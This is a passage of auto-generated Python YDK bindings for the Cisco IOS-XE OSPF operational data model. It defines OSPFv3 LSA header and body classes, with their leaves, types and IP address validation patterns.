**type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: lsa_header LSA header **type**\: :py:class:`LsaHeader <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader>` **config**\: False .. attribute:: lsa_hdr_options OSPFv3 LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])), ]) self.lsa_id = None self.lsa_hdr_options = Bits() self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader() self.lsa_header.parent = self self._children_name_map["lsa_header"] = "lsa-header" self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value) class LsaHeader(Entity): """ LSA header .. attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. 
attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. attribute:: checksum LSA checksum **type**\: str **config**\: False .. attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader, self).__init__() self.yang_name = "lsa-header" self.yang_parent_name = "header" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ]) self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self._segment_path = lambda: "lsa-header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value) class LsaBody(Entity): """ Decoded OSPFv3 LSA body .. attribute:: network OSPFv3 network **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network>` **config**\: False .. 
attribute:: prefix OSPFv3 inter area prefix **type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix>` **config**\: False .. attribute:: ia_router OSPFv3 inter area router **type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter>` **config**\: False .. attribute:: lsa_external OSPFv3 LSA external **type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal>` **config**\: False .. attribute:: nssa OSPFv3 NSSA **type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa>` **config**\: False .. attribute:: link_data OSPFv3 Link data **type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData>` **config**\: False .. attribute:: ia_prefix OSPFv3 Intra area prefixes **type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix>` **config**\: False .. attribute:: lsa_flag_options LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False .. 
attribute:: lsa_body_flags LSA Body Flags **type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix))]) self._leafs = OrderedDict([ ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])), ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])), ]) self.lsa_flag_options = Bits() self.lsa_body_flags = Bits() self.network = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix() 
self.prefix.parent = self self._children_name_map["prefix"] = "prefix" self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter() self.ia_router.parent = self self._children_name_map["ia_router"] = "ia-router" self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal() self.lsa_external.parent = self self._children_name_map["lsa_external"] = "lsa-external" self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa() self.nssa.parent = self self._children_name_map["nssa"] = "nssa" self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData() self.link_data.parent = self self._children_name_map["link_data"] = "link-data" self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix() self.ia_prefix.parent = self self._children_name_map["ia_prefix"] = "ia-prefix" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value) class Network(Entity): """ OSPFv3 network .. attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False .. 
attribute:: lsa_net_options Network LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])), ]) self.attached_router = [] self.lsa_net_options = Bits() self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value) class Prefix(Entity): """ OSPFv3 inter area prefix .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ia_prefix Inter area Prefix **type**\: str **config**\: False .. 
attribute:: ia_prefix_options Inter area prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix, self).__init__() self.yang_name = "prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])), ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])), ]) self.metric = None self.ia_prefix = None self.ia_prefix_options = None self._segment_path = lambda: "prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value) class IaRouter(Entity): """ OSPFv3 inter area router .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: destination_router_id Router ID of the router being described by the LSA **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: lsa_ia_options Inter area LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter, self).__init__() self.yang_name = "ia-router" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])), ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])), ]) self.metric = None self.destination_router_id = None self.lsa_ia_options = Bits() self._segment_path = lambda: "ia-router" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value) class LsaExternal(Entity): """ OSPFv3 LSA external .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: flags LSA Flags **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags>` **config**\: False .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: external_prefix Prefix **type**\: str **config**\: False .. attribute:: external_prefix_options Prefix options **type**\: str **config**\: False .. 
attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__() self.yang_name = "lsa-external" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None 
self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): """ LSA Flags .. attribute:: e_flag When set, the metric specified is a Type 2 external metric **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value) class Nssa(Entity): """ OSPFv3 NSSA .. 
attribute:: lsa_nssa_external NSSA LSA **type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa, self).__init__() self.yang_name = "nssa" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))]) self._leafs = OrderedDict() self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal() self.lsa_nssa_external.parent = self self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external" self._segment_path = lambda: "nssa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa, [], name, value) class LsaNssaExternal(Entity): """ NSSA LSA .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: flags LSA Flags **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags>` **config**\: False .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: external_prefix Prefix **type**\: str **config**\: False .. attribute:: external_prefix_options Prefix options **type**\: str **config**\: False .. 
attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__() self.yang_name = "lsa-nssa-external" self.yang_parent_name = "nssa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None 
self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-nssa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): """ LSA Flags .. attribute:: e_flag When set, the metric specified is a Type 2 external metric **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-nssa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value) class LinkData(Entity): """ OSPFv3 Link data .. attribute:: rtr_priority Router priority of the interce **type**\: int **range:** 0..255 **config**\: False .. 
attribute:: link_local_interface_address The originating router's link\-local interface address on the link **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_id_options Link data LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData, self).__init__() self.yang_name = "link-data" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])), ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])), ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])), ]) self.rtr_priority = None self.link_local_interface_address = None self.num_of_prefixes = None self.lsa_id_options = Bits() self._segment_path = lambda: "link-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 
'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value) class IaPrefix(Entity): """ OSPFv3 Intra area prefixes .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_adv_router Referenced Advertising Router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__() self.yang_name = "ia-prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])), ]) self.referenced_ls_type = None self.referenced_link_state_id = None self.referenced_adv_router = None self.num_of_prefixes = None self._segment_path = lambda: "ia-prefix" self._is_frozen = True def 
__setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value) class Ospfv3Link(Entity): """ OSPFv3 links .. attribute:: interface_id (key) Interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_interface_id (key) Neighbor interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_router_id (key) Neighbor router ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. attribute:: metric Metric **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link, self).__init__() self.yang_name = "ospfv3-link" self.yang_parent_name = 